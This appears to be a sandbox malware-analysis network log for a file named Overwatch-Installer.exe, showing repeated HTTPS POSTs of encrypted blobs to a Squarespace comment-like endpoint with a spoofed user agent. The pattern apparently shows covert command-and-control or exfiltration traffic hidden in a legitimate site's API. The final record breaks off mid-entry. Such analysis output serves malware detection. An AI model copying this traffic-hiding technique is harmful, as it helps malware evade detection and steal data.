2024-09-01 20:04:40 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:40 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BVhjyAC0DehVZWNlZTk2NGYxZDI3NmMwMDk0MWU1MDBmYzRkZTRl; Path=/; Secure Set-Cookie: crumb=BQ1E5VLUqiSAODI3MTIxZGQ5MjYwZDg5MTYzMDhkNGZmNmMwYjRh; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: pQjIIFCp/416X4saB Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BQ1E5VLUqiSAODI3MTIxZGQ5MjYwZDg5MTYzMDhkNGZmNmMwYjRh"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.5	49782	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:41 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:42 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:42 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:42 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:42 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:42 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BZq9i4sNNyQRMGY2MzlmYmQxNzdmOTIyYzMwZGNmNTg1YTVkNGMw; Path=/; Secure Set-Cookie: crumb=Bf93N8h2sRJ2MGQ0YzViY2Q0MzY0MGExMGQ1ODhmODM3ZjFkODZm; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: F6gcaQKz/Qa8WIB4M Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"Bf93N8h2sRJ2MGQ0YzViY2Q0MzY0MGExMGQ1ODhmODM3ZjFkODZm"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.5	49783	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:41 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:42 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:42 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:42 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:42 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:42 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BQeLbxaNqjXjZTk1NjkzOWRmODBiMmU3ZTVhYTQxZDliNjMyOGQ1; Path=/; Secure Set-Cookie: crumb=BXxCITeWHmV8NDBlODk5ZTA5MjhhMGVjM2M3ZGM3MDgxMGRiMmVj; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: 5vszwWgK/dljRhZsI Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BXxCITeWHmV8NDBlODk5ZTA5MjhhMGVjM2M3ZGM3MDgxMGRiMmVj"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.5	49784	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:42 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 330 Expect: 100-continue
2024-09-01 20:04:43 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:43 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:43 UTC	329	OUT	Data Raw: 3d 78 63 62 6d 52 4b 6e 64 79 62 37 53 47 62 38 66 46 62 68 2f 4d 70 68 69 42 61 35 51 7a 74 6e 4b 6c 42 4e 39 25 32 42 4e 58 4e 55 6b 78 67 74 4e 65 4e 51 5a 2f 6d 6d 4d 72 38 59 48 54 4d 4c 58 43 73 45 6d 47 6f 42 2f 6d 66 71 38 25 32 42 33 37 30 61 63 67 4b 5a 49 34 65 36 33 54 37 6e 52 49 79 76 32 66 45 36 41 74 55 38 6b 6b 63 51 50 36 50 51 50 50 61 46 37 39 36 69 66 36 57 6f 4b 77 4c 33 35 7a 6d 78 63 67 38 6f 34 61 57 75 36 5a 62 31 62 48 42 30 54 43 57 5a 64 6c 68 72 75 4f 4e 74 39 4f 73 63 33 39 75 58 61 2f 47 6a 69 72 6c 63 46 59 58 72 36 73 4a 4d 55 46 6b 39 66 4a 77 62 46 5a 6b 50 58 44 41 36 42 71 62 31 36 52 38 48 32 43 33 4e 49 4a 70 50 35 64 30 56 57 25 32 42 2f 65 35 61 32 59 25 32 42 33 31 4e 7a 58 42 6b 63 52 70 6d 35 25 32 42 50 50 6d Data Ascii: =xcbmRKndyb7SGb8fFbh/MphiBa5QztnKlBN9%2BNXNUkxgtNeNQZ/mmMr8YHTMLXCsEmGoB/mfq8%2B370acgKZI4e63T7nRIyv2fE6AtU8kkcQP6PQPPaF796if6WoKwL35zmxcg8o4aWu6Zb1bHB0TCWZdlhruONt9Osc39uXa/GjirlcFYXr6sJMUFk9fJwbFZkPXDA6Bqb16R8H2C3NIJpP5d0VW%2B/e5a2Y%2B31NzXBkcRpm5%2BPPm
2024-09-01 20:04:43 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:42 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BfazksJDKRUEYzA0Y2Q5YjY2YzU0N2E5NWUwMmFlNjYxZDBmMWYw; Path=/; Secure Set-Cookie: crumb=BQMyAsO5UAxgZjFkZjNiMTQ4NTE3N2IzYjRkMTA5OWM4YjNiMTc4; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: aI9ZZz4B/0lpQsMzq Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BQMyAsO5UAxgZjFkZjNiMTQ4NTE3N2IzYjRkMTA5OWM4YjNiMTc4"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.5	49785	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:42 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:43 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:43 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:43 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:43 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:42 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=Bf-dnrxq2AnSYjAxMmE0NDJjNzM4ZDU5NTg3ZTAxZmZmOTUyMTM2; Path=/; Secure Set-Cookie: crumb=BXOuueriPESGYjFlOGJhODY3NGMxNjVkNTlhZDI5ZjQ1ZjMyMjg4; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: SDKnI88N/pVitbKp9 Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BXOuueriPESGYjFlOGJhODY3NGMxNjVkNTlhZDI5ZjQ1ZjMyMjg4"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.5	49786	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:43 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:43 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:43 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:43 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:43 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:43 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BcCR8JDqMpkOZmQ5ZjU4MjYxM2MxYmEwNWUzNzZjM2Q5MDBhY2Zj; Path=/; Secure Set-Cookie: crumb=BeBsl2zaH_bRYjQ4ZmJmYTRmYzM5OWJmYzk1OGI0ZTUxNjEzYTll; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: Jizdk3g7/zCyU9cOi Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BeBsl2zaH_bRYjQ4ZmJmYTRmYzM5OWJmYzk1OGI0ZTUxNjEzYTll"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.5	49787	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:43 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:43 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:43 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:43 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:44 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:43 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BTq0VI9q6195OTExY2E3ZDUxNjgyYzA5MTMxYmFjZmRjN2U2ZjZl; Path=/; Secure Set-Cookie: crumb=BUVXTmdlaNDQZTI2Y2VmODA5YmNjN2IyMTllZmJiNTJhZThmNDJj; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: hJtvBVIZ/1B1TZAh9 Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BUVXTmdlaNDQZTI2Y2VmODA5YmNjN2IyMTllZmJiNTJhZThmNDJj"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.5	49788	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:44 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:44 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:44 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:44 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:44 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:44 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=Bfi1wq3LinhzMmNiN2JmYWY2MTMxMTM5NWFhMGJhMTk5MjdiNWI4; Path=/; Secure Set-Cookie: crumb=BRLK3h2HysSGYjEyMzQyNjI4ZWI0ZDk2NTZjMGE0OTI5MTVkNzE1; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: bmGbjKrq/Tu1JOqR7 Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BRLK3h2HysSGYjEyMzQyNjI4ZWI0ZDk2NTZjMGE0OTI5MTVkNzE1"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.5	49789	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:44 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 20:04:44 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:44 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:44 UTC	279	OUT	Data Raw: 3d 43 75 7a 36 4a 56 6a 42 6f 33 64 25 32 42 73 6f 73 68 78 70 38 51 70 35 6b 70 57 46 54 45 30 6e 4b 54 67 53 61 38 70 31 56 64 77 52 25 32 42 71 4a 78 78 67 69 46 68 41 65 68 43 6e 44 65 4f 61 4f 4b 34 55 4f 2f 39 32 57 6e 57 6c 47 75 56 62 6b 78 4d 43 4a 75 4a 71 58 6c 7a 42 7a 45 73 71 56 6f 45 65 61 67 45 4e 45 4c 31 74 58 74 6b 6e 25 32 42 37 48 58 50 6b 4b 41 36 54 79 37 37 73 6a 70 53 77 6d 35 4e 67 79 52 51 44 39 5a 38 63 73 75 53 6d 43 49 59 54 77 73 56 64 67 30 6a 43 59 58 35 42 75 75 44 61 51 25 32 42 4f 33 36 2f 78 78 47 64 46 6c 73 53 4c 46 25 32 42 50 30 50 6e 67 6e 51 45 53 32 31 4c 68 4c 4c 43 5a 30 32 61 68 6c 71 72 46 47 49 4d 6d 33 55 46 32 77 74 62 6c 68 32 34 4b 6c 56 73 72 4b 74 6c 35 39 6c 41 36 51 49 6f 42 76 50 4a 34 67 76 6b 32 Data Ascii: =Cuz6JVjBo3d%2Bsoshxp8Qp5kpWFTE0nKTgSa8p1VdwR%2BqJxxgiFhAehCnDeOaOK4UO/92WnWlGuVbkxMCJuJqXlzBzEsqVoEeagENEL1tXtkn%2B7HXPkKA6Ty77sjpSwm5NgyRQD9Z8csuSmCIYTwsVdg0jCYX5BuuDaQ%2BO36/xxGdFlsSLF%2BP0PngnQES21LhLLCZ02ahlqrFGIMm3UF2wtblh24KlVsrKtl59lA6QIoBvPJ4gvk2
2024-09-01 20:04:44 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 20:04:44 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=Bd-hmh019Iu-YTVhMWQ1ODIwNjAyOGQxOTU3ZjA0NzdiMGYwNDFj; Path=/; Secure Set-Cookie: crumb=Be3rhbqeauf6MGY1NTY5ZWM0NzVhMjExMGY1YjU4MWExMzJmZDll; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: sekQOZOg/6JI9v2ka Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"Be3rhbqeauf6MGY1NTY5ZWM0NzVhMjExMGY1YjU4MWExMzJmZDll"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.5	49790	198.185.159.177	443	7160	C:\Users\user\Desktop\Overwatch-Installer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 20:04:45 UTC	293	OUT	POST /api/comment/LikeComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 330 Expect: 100-continue
2024-09-01 20:04:45 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 20:04:45 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 20:04:45 UTC	329	OUT	Data Raw: 3d 78 63 62 6d 52 4b 6e 64 79 62 37 53 47 62 38 66 46 62 68 2f 4d 70 68 69 42 61 35 51 7a 74 6e 4b 6c 42 4e 39 25 32 42 4e 58 4e 55 6b 78 67 74 4e 65 4e 51 5a 2f 6d 6d 4d 72 38 59 48 54 4d 4c 58 43 73 45 6d 47 6f 42 2f 6d 66 71 38 25 32 42 33 37 30 61 63 67 4b 5a 49 34 65 36 33 54 37 6e 52 49 79 76 32 50 4b 73 66 67 59 4f 50 59 71 4c 55 51 49 54 59 45 4c 56 52 45 4b 69 66 36 57 6f 4b 77 4c 33 35 7a 6d 78 63 67 38 6f 34 61 57 75 36 5a 62 31 62 48 42 30 54 43 57 5a 64 6c 68 72 75 4f 4e 74 39 4f 73 63 33 39 75 58 61 2f 47 6a 69 72 6c 63 46 59 58 72 36 73 4a 4d 55 46 6b 39 66 4a 77 62 46 5a 6b 50 58 44 41 36 42 71 62 31 36 52 38 48 32 43 33 4e 49 4a 70 50 35 64 30 56 57 25 32 42 2f 65 35 61 32 59 25 32 42 33 31 4e 7a 58 42 6b 63 52 70 6d 35 25 32 42 50 50 6d Data Ascii: 